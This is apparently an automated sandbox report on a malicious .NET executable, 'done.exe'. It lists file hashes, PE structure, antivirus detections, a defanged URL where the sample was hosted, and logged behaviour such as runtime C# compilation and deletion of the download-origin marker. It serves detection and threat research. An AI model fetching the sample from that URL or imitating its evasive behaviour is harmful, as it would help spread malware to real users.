MalScore: 100/100
MalFamily: Malicious

done.exe

Is DLL Packer Anti Debug Anti VM Signed XOR AntiVirus 16/64 Related 2235
File details
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
File size: 364.50 KB (373248 bytes)
Compile time: 2018-05-27 11:44:32
MD5: aa13f27d17df27f5c8097848044d252f
SHA1: 4155bac9f7e35238132884ceaaaf2c09e665b948
SHA256: 814e24148da007db7fc945898d7e44706296d42143140b1d81726b8e9be7fadc
Import hash: f34d5f2d4577ed6d9ceec516c1f5a744
Sections: 3 (.text, .rsrc, .reloc)
Directories: 3 (import, resource, relocation)
First submission: 2018-05-27 19:24:06
Last submission: 2018-05-27 19:24:06
Filename detected: - done.exe (1)
URL file hosting
hXXp://ramatfactory.com.sa/windows/done.exe (VirusTotal)
Antivirus Report
Report Date Detection Ratio Permalink Update
2018-05-27 15:50:53 [16/64] VirusTotal
PE Sections 1 suspicious
Name VAddress VSize Size MD5 SHA1
.text 0x2000 0x3184 12800 d1bb8e008745457735ea39a7c32266fa 6f569178a4199d9571c2ae83227ba283ed6384ad
.rsrc 0x6000 0x57ae2 359424 d032a58c65cd79802ed2b44cd46e2fc4 6214a0a552f30e59872b308ab14f8409528ab109
.reloc 0x5e000 0xc 512 3c601df18c5f82de677b8c0a98427282 bcd23614b681b524481d8de7b25c474cdb60ac17
PE Resources
Name Offset Size Language Sublanguage Data
RT_ICON 0x39d08 1128 LANG_NEUTRAL SUBLANG_NEUTRAL
RT_GROUP_ICON 0x3a170 132 LANG_NEUTRAL SUBLANG_NEUTRAL
RT_VERSION 0x3a1f4 636 LANG_NEUTRAL SUBLANG_NEUTRAL
RT_HTML 0x3a470 144519 LANG_GERMAN SUBLANG_GERMAN
RT_MANIFEST 0x5d8f8 490 LANG_NEUTRAL SUBLANG_NEUTRAL
  • API Alert
  • Anti Debug
Meta Info
LegalCopyright:
Assembly Version: 0.0.0.0
InternalName: 9D08940x9AaLl1so.CIL.exe
FileVersion: 0.0.0.0
FileDescription:
Translation: 0x0000 0x04b0
OriginalFilename: 9D08940x9AaLl1so.CIL.exe
ProductVersion: 0.0.0.0
XOR
No XOR information found in this file.
Signature
This file isn't digitally signed
Packer(s)
Microsoft Visual C# / Basic .NET
Microsoft Visual Studio .NET
.NET executable
Microsoft Visual C# v7.0 / Basic .NET
File found
File type: Library
mscoree.dll
IP Found
No IP detected
URL(s)
No URL found
String too long
Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven01b_64 Seven01b_64 VirtualBox 2018-05-28 14:18:44 2018-05-28 14:21:37 173

8 Behaviors detected by system signatures

9 Summary items with data

Files

C:\Windows\System32\MSCOREE.DLL.local
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
C:\Windows\Microsoft.NET\Framework\*
C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll
C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll
C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll
C:\Users\Seven01\AppData\Local\Temp\done.exe.config
C:\Users\Seven01\AppData\Local\Temp\done.exe
C:\Users\Seven01\AppData\Local\Temp\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\system\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\ProgramData\Oracle\Java\javapath\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\wbem\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\WindowsPowerShell\v1.0\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\unrar\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Python27\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSVCR120_CLR0400.dll
C:\Windows\System32\MSVCR120_CLR0400.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoree.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config
C:\Windows\Microsoft.NET\Framework\v4.0.30319\fusion.localgac
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll.aux
C:\Users
C:\Users\Seven01
C:\Users\Seven01\AppData
C:\Users\Seven01\AppData\Local
C:\Users\Seven01\AppData\Local\Temp
C:\Windows\Microsoft.NET\Framework\v4.0.30319\ole32.dll
\Device\KsecDD
C:\Windows\assembly\NativeImages_v4.0.30319_32\9D08940x9AaLl1so.CIL\*
C:\Users\Seven01\AppData\Local\Temp\done.INI
C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll
C:\Windows\assembly\pubpol23.dat
C:\Windows\assembly\GAC\PublisherPolicy.tme
C:\Windows\Microsoft.Net\assembly\GAC_32\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System\*

Read Files


Write Files

C:\Users\Seven01\AppData\Local\Temp\xfqgveh4.tmp
C:\Users\Seven01\AppData\Local\Temp\xfqgveh4.0.cs
C:\Users\Seven01\AppData\Local\Temp\xfqgveh4.dll
C:\Users\Seven01\AppData\Local\Temp\xfqgveh4.cmdline
C:\Users\Seven01\AppData\Local\Temp\xfqgveh4.out
C:\Users\Seven01\AppData\Local\Temp\xfqgveh4.err
C:\Users\Seven01\done.exe
C:\Users\Seven01\AppData\Local\Temp\xfqgveh4.pdb
C:\Users\Seven01\AppData\Local\Temp\CSC5CB01F4646E345F29F6436C963741A31.TMP
C:\Users\Seven01\AppData\Local\Temp\RES24E8.tmp

Delete Files

C:\Users\Seven01\AppData\Local\Temp\xfqgveh4.0.cs
C:\Users\Seven01\AppData\Local\Temp\xfqgveh4.pdb
C:\Users\Seven01\AppData\Local\Temp\xfqgveh4.dll
C:\Users\Seven01\AppData\Local\Temp\xfqgveh4.err
C:\Users\Seven01\AppData\Local\Temp\xfqgveh4.tmp
C:\Users\Seven01\AppData\Local\Temp\xfqgveh4.cmdline
C:\Users\Seven01\AppData\Local\Temp\xfqgveh4.out
C:\Users\Seven01\done.exe:Zone.Identifier
C:\Users\Seven01\AppData\Local\Temp\RES24E8.tmp
C:\Users\Seven01\AppData\Local\Temp\CSC5CB01F4646E345F29F6436C963741A31.TMP

Keys


Read Keys


Write Keys

Nothing to display

Delete Keys

Nothing to display

Mutexes

-

Resolved APIs


Execute Commands

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Seven01\AppData\Local\Temp\xfqgveh4.cmdline"
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Seven01\AppData\Local\Temp\RES24E8.tmp" "c:\Users\Seven01\AppData\Local\Temp\CSC5CB01F4646E345F29F6436C963741A31.TMP"

Started Services

Nothing to display

Created Services

Nothing to display

#infosec #automation

TheSystem Itself @ 2018-05-27 19:26:18

Detected family: #Malicious

TheSystem Itself @ 2018-05-28 15:00:02